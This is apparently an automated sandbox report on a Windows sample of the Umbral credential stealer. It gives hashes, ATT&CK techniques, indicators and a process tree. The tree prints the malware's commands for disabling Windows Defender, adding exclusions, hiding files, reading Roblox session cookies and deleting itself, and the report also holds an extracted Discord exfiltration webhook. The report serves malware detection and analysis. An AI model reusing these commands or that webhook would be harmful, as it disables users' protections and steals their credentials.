umbral | 1eac7f1debb3f6c96260977b111028ae3dcf2d7907e1a2c916044c3942e9e05d

Analysis

max time kernel
26s
max time network
28s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
16-08-2024 18:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LOADER.exe
Size

15.5MB
MD5

5f62b2a17cda80f8ef9bf521fde17e42
SHA1

5086572ec9aa37b50590a36300b374160d8ffacb
SHA256

1eac7f1debb3f6c96260977b111028ae3dcf2d7907e1a2c916044c3942e9e05d
SHA512

24e72654fd5fbe2a646d0e9b9ca239852d630de426002f3b7ac56c5a16c12037c1559a6e8420e535fd4fd7865b4f8ec2c5330f83b0781287251a4076d3a0a139
SSDEEP

393216:HV0WnD+wO04M1o4FJO22+j79cC/QWXtsVy5J58mu+F2f3nDNzxg:1dniwO04L4+l+j79H/QW3zFIPpa

Score

10^/10

umbral credential_access discovery execution spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1270702077819097171/aH_welMr5BV0d8bcgAcZ1YefXQZm7768r2-61SpHYIVQE_jXaf2nibmp1wX6DuE5bOcQ

Signatures

Detect Umbral payload 7 IoCs

resource	yara_rule
behavioral2/files/0x003000000001939b-14.dat	family_umbral
behavioral2/memory/2736-15-0x0000000000E10000-0x0000000000E50000-memory.dmp	family_umbral
behavioral2/memory/1596-75-0x00000000011F0000-0x0000000001230000-memory.dmp	family_umbral
behavioral2/memory/596-130-0x0000000000080000-0x00000000000C0000-memory.dmp	family_umbral
behavioral2/memory/1844-187-0x00000000002C0000-0x0000000000300000-memory.dmp	family_umbral
behavioral2/memory/1740-242-0x00000000008F0000-0x0000000000930000-memory.dmp	family_umbral
behavioral2/memory/2800-281-0x0000000000A80000-0x0000000000AC0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 23 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2724	powershell.exe
2640	powershell.exe
860	powershell.exe
2840	powershell.exe
1840	powershell.exe
2784	powershell.exe
348	powershell.exe
2496	powershell.exe
2052	powershell.exe
2036	powershell.exe
3020	powershell.exe
2876	powershell.exe
1076	powershell.exe
2888	powershell.exe
2204	powershell.exe
1320	powershell.exe
2844	powershell.exe
2552	powershell.exe
620	powershell.exe
2768	powershell.exe
2548	powershell.exe
3016	powershell.exe
2104	powershell.exe

Drops file in Drivers directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Executes dropped EXE 20 IoCs

pid	Process
2224	loaderexp.exe
2736	Umbral.exe
2360	Umbral.exe
1892	loaderexp.exe
2380	loaderexp.exe
1596	Umbral.exe
2360	loaderexp.exe
2980	Umbral.exe
2160	loaderexp.exe
596	Umbral.exe
2644	Umbral.exe
2608	loaderexp.exe
988	loaderexp.exe
1844	Umbral.exe
1232	loaderexp.exe
2380	Umbral.exe
1464	loaderexp.exe
1740	Umbral.exe
1872	loaderexp.exe
1076	Umbral.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
7	discord.com
8	discord.com
14	discord.com
15	discord.com
22	discord.com
28	discord.com
35	discord.com
21	discord.com
34	discord.com

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com
11	ip-api.com
18	ip-api.com
25	ip-api.com
31	ip-api.com
38	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 10 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2020	cmd.exe
1784	PING.EXE
2228	cmd.exe
1072	PING.EXE
1536	PING.EXE
1320	cmd.exe
2660	PING.EXE
776	cmd.exe
2152	cmd.exe
1032	PING.EXE

Detects videocard installed 1 TTPs 5 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2764	wmic.exe
2248	wmic.exe
2224	wmic.exe
280	wmic.exe
2912	wmic.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
1784	PING.EXE
2660	PING.EXE
1072	PING.EXE
1032	PING.EXE
1536	PING.EXE

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
2736	Umbral.exe
2640	powershell.exe
620	powershell.exe
1320	powershell.exe
2648	powershell.exe
2768	powershell.exe
1596	Umbral.exe
860	powershell.exe
348	powershell.exe
2844	powershell.exe
2660	powershell.exe
2876	powershell.exe
596	Umbral.exe
2840	powershell.exe
1076	powershell.exe
2496	powershell.exe
860	powershell.exe
2888	powershell.exe
1844	Umbral.exe
1840	powershell.exe
2548	powershell.exe
3016	powershell.exe
1524	powershell.exe
2052	powershell.exe
1740	Umbral.exe
2784	powershell.exe
2036	powershell.exe
2552	powershell.exe
2780	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2736	Umbral.exe
Token: SeIncreaseQuotaPrivilege	2800	wmic.exe
Token: SeSecurityPrivilege	2800	wmic.exe
Token: SeTakeOwnershipPrivilege	2800	wmic.exe
Token: SeLoadDriverPrivilege	2800	wmic.exe
Token: SeSystemProfilePrivilege	2800	wmic.exe
Token: SeSystemtimePrivilege	2800	wmic.exe
Token: SeProfSingleProcessPrivilege	2800	wmic.exe
Token: SeIncBasePriorityPrivilege	2800	wmic.exe
Token: SeCreatePagefilePrivilege	2800	wmic.exe
Token: SeBackupPrivilege	2800	wmic.exe
Token: SeRestorePrivilege	2800	wmic.exe
Token: SeShutdownPrivilege	2800	wmic.exe
Token: SeDebugPrivilege	2800	wmic.exe
Token: SeSystemEnvironmentPrivilege	2800	wmic.exe
Token: SeRemoteShutdownPrivilege	2800	wmic.exe
Token: SeUndockPrivilege	2800	wmic.exe
Token: SeManageVolumePrivilege	2800	wmic.exe
Token: 33	2800	wmic.exe
Token: 34	2800	wmic.exe
Token: 35	2800	wmic.exe
Token: SeIncreaseQuotaPrivilege	2800	wmic.exe
Token: SeSecurityPrivilege	2800	wmic.exe
Token: SeTakeOwnershipPrivilege	2800	wmic.exe
Token: SeLoadDriverPrivilege	2800	wmic.exe
Token: SeSystemProfilePrivilege	2800	wmic.exe
Token: SeSystemtimePrivilege	2800	wmic.exe
Token: SeProfSingleProcessPrivilege	2800	wmic.exe
Token: SeIncBasePriorityPrivilege	2800	wmic.exe
Token: SeCreatePagefilePrivilege	2800	wmic.exe
Token: SeBackupPrivilege	2800	wmic.exe
Token: SeRestorePrivilege	2800	wmic.exe
Token: SeShutdownPrivilege	2800	wmic.exe
Token: SeDebugPrivilege	2800	wmic.exe
Token: SeSystemEnvironmentPrivilege	2800	wmic.exe
Token: SeRemoteShutdownPrivilege	2800	wmic.exe
Token: SeUndockPrivilege	2800	wmic.exe
Token: SeManageVolumePrivilege	2800	wmic.exe
Token: 33	2800	wmic.exe
Token: 34	2800	wmic.exe
Token: 35	2800	wmic.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeDebugPrivilege	620	powershell.exe
Token: SeDebugPrivilege	1320	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeIncreaseQuotaPrivilege	2432	wmic.exe
Token: SeSecurityPrivilege	2432	wmic.exe
Token: SeTakeOwnershipPrivilege	2432	wmic.exe
Token: SeLoadDriverPrivilege	2432	wmic.exe
Token: SeSystemProfilePrivilege	2432	wmic.exe
Token: SeSystemtimePrivilege	2432	wmic.exe
Token: SeProfSingleProcessPrivilege	2432	wmic.exe
Token: SeIncBasePriorityPrivilege	2432	wmic.exe
Token: SeCreatePagefilePrivilege	2432	wmic.exe
Token: SeBackupPrivilege	2432	wmic.exe
Token: SeRestorePrivilege	2432	wmic.exe
Token: SeShutdownPrivilege	2432	wmic.exe
Token: SeDebugPrivilege	2432	wmic.exe
Token: SeSystemEnvironmentPrivilege	2432	wmic.exe
Token: SeRemoteShutdownPrivilege	2432	wmic.exe
Token: SeUndockPrivilege	2432	wmic.exe
Token: SeManageVolumePrivilege	2432	wmic.exe
Token: 33	2432	wmic.exe
Token: 34	2432	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2128 wrote to memory of 2776	2128	LOADER.exe	29
PID 2128 wrote to memory of 2776	2128	LOADER.exe	29
PID 2128 wrote to memory of 2776	2128	LOADER.exe	29
PID 2128 wrote to memory of 2224	2128	LOADER.exe	73
PID 2128 wrote to memory of 2224	2128	LOADER.exe	73
PID 2128 wrote to memory of 2224	2128	LOADER.exe	73
PID 2128 wrote to memory of 2736	2128	LOADER.exe	31
PID 2128 wrote to memory of 2736	2128	LOADER.exe	31
PID 2128 wrote to memory of 2736	2128	LOADER.exe	31
PID 2736 wrote to memory of 2800	2736	Umbral.exe	33
PID 2736 wrote to memory of 2800	2736	Umbral.exe	33
PID 2736 wrote to memory of 2800	2736	Umbral.exe	33
PID 2736 wrote to memory of 2600	2736	Umbral.exe	35
PID 2736 wrote to memory of 2600	2736	Umbral.exe	35
PID 2736 wrote to memory of 2600	2736	Umbral.exe	35
PID 2736 wrote to memory of 2640	2736	Umbral.exe	37
PID 2736 wrote to memory of 2640	2736	Umbral.exe	37
PID 2736 wrote to memory of 2640	2736	Umbral.exe	37
PID 2736 wrote to memory of 620	2736	Umbral.exe	39
PID 2736 wrote to memory of 620	2736	Umbral.exe	39
PID 2736 wrote to memory of 620	2736	Umbral.exe	39
PID 2736 wrote to memory of 1320	2736	Umbral.exe	89
PID 2736 wrote to memory of 1320	2736	Umbral.exe	89
PID 2736 wrote to memory of 1320	2736	Umbral.exe	89
PID 2736 wrote to memory of 2648	2736	Umbral.exe	43
PID 2736 wrote to memory of 2648	2736	Umbral.exe	43
PID 2736 wrote to memory of 2648	2736	Umbral.exe	43
PID 2776 wrote to memory of 2628	2776	loader.exe	45
PID 2776 wrote to memory of 2628	2776	loader.exe	45
PID 2776 wrote to memory of 2628	2776	loader.exe	45
PID 2776 wrote to memory of 1892	2776	loader.exe	46
PID 2776 wrote to memory of 1892	2776	loader.exe	46
PID 2776 wrote to memory of 1892	2776	loader.exe	46
PID 2776 wrote to memory of 2360	2776	loader.exe	87
PID 2776 wrote to memory of 2360	2776	loader.exe	87
PID 2776 wrote to memory of 2360	2776	loader.exe	87
PID 2736 wrote to memory of 2432	2736	Umbral.exe	48
PID 2736 wrote to memory of 2432	2736	Umbral.exe	48
PID 2736 wrote to memory of 2432	2736	Umbral.exe	48
PID 2736 wrote to memory of 2244	2736	Umbral.exe	95
PID 2736 wrote to memory of 2244	2736	Umbral.exe	95
PID 2736 wrote to memory of 2244	2736	Umbral.exe	95
PID 2736 wrote to memory of 2392	2736	Umbral.exe	52
PID 2736 wrote to memory of 2392	2736	Umbral.exe	52
PID 2736 wrote to memory of 2392	2736	Umbral.exe	52
PID 2736 wrote to memory of 2768	2736	Umbral.exe	96
PID 2736 wrote to memory of 2768	2736	Umbral.exe	96
PID 2736 wrote to memory of 2768	2736	Umbral.exe	96
PID 2736 wrote to memory of 280	2736	Umbral.exe	56
PID 2736 wrote to memory of 280	2736	Umbral.exe	56
PID 2736 wrote to memory of 280	2736	Umbral.exe	56
PID 2736 wrote to memory of 2020	2736	Umbral.exe	58
PID 2736 wrote to memory of 2020	2736	Umbral.exe	58
PID 2736 wrote to memory of 2020	2736	Umbral.exe	58
PID 2020 wrote to memory of 1536	2020	cmd.exe	60
PID 2020 wrote to memory of 1536	2020	cmd.exe	60
PID 2020 wrote to memory of 1536	2020	cmd.exe	60
PID 2628 wrote to memory of 1836	2628	loader.exe	61
PID 2628 wrote to memory of 1836	2628	loader.exe	61
PID 2628 wrote to memory of 1836	2628	loader.exe	61
PID 2628 wrote to memory of 2380	2628	loader.exe	62
PID 2628 wrote to memory of 2380	2628	loader.exe	62
PID 2628 wrote to memory of 2380	2628	loader.exe	62
PID 2628 wrote to memory of 1596	2628	loader.exe	63

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2712	attrib.exe
2236	attrib.exe
1440	attrib.exe
1480	attrib.exe
2600	attrib.exe
376	attrib.exe

C:\Users\Admin\AppData\Local\Temp\LOADER.exe
"C:\Users\Admin\AppData\Local\Temp\LOADER.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2128
- C:\Users\Admin\AppData\Local\Temp\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2776
- - C:\Users\Admin\AppData\Local\Temp\loader.exe
    "C:\Users\Admin\AppData\Local\Temp\loader.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2628
  - - C:\Users\Admin\AppData\Local\Temp\loader.exe
      "C:\Users\Admin\AppData\Local\Temp\loader.exe"
      4⤵
      PID:1836
    - - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        5⤵
        
        PID:868
      - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        6⤵
        
        PID:2152
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        7⤵
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        8⤵
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        9⤵
        
        PID:2072
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        10⤵
        
        PID:2872
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        11⤵
        
        PID:1268
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        12⤵
        
        PID:3056
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        13⤵
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        13⤵
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        13⤵
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        12⤵
        
        PID:2024
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        12⤵
        
        PID:2800
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        13⤵
        
        PID:1624
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        13⤵
        Views/modifies file attributes
        
        PID:1480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        13⤵
        
        PID:1996
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        13⤵
        
        PID:2168
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        13⤵
        
        PID:2792
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        13⤵
        
        PID:2100
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        11⤵
        Executes dropped EXE
        
        PID:1872
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        11⤵
        Executes dropped EXE
        
        PID:1076
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        10⤵
        Executes dropped EXE
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        10⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1740
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        11⤵
        
        PID:2128
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        11⤵
        Views/modifies file attributes
        
        PID:1440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2780
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        11⤵
        
        PID:2660
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        11⤵
        
        PID:1580
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        11⤵
        
        PID:2864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3020
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        11⤵
        Detects videocard installed
        
        PID:2224
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2152
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1032
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        9⤵
        Executes dropped EXE
        
        PID:1232
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        9⤵
        Executes dropped EXE
        
        PID:2380
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        8⤵
        Executes dropped EXE
        
        PID:988
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        8⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1844
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        9⤵
        
        PID:1132
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        9⤵
        Views/modifies file attributes
        
        PID:2236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1524
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        9⤵
        
        PID:2408
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        9⤵
        
        PID:408
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        9⤵
        
        PID:2064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2052
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        9⤵
        Detects videocard installed
        
        PID:2248
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:776
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1072
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        7⤵
        Executes dropped EXE
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        7⤵
        Executes dropped EXE
        
        PID:2644
      - C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        6⤵
        Executes dropped EXE
        
        PID:2160
      - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:596
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:2244
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        7⤵
        Views/modifies file attributes
        
        PID:2712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:860
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        
        PID:2652
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        7⤵
        
        PID:2536
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:1028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2888
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:2764
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2228
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2660
    - - C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        5⤵
        Executes dropped EXE
        
        PID:2360
    - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        5⤵
        Executes dropped EXE
        
        PID:2980
  - - C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
      "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
      4⤵
      Executes dropped EXE
      PID:2380
  - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1596
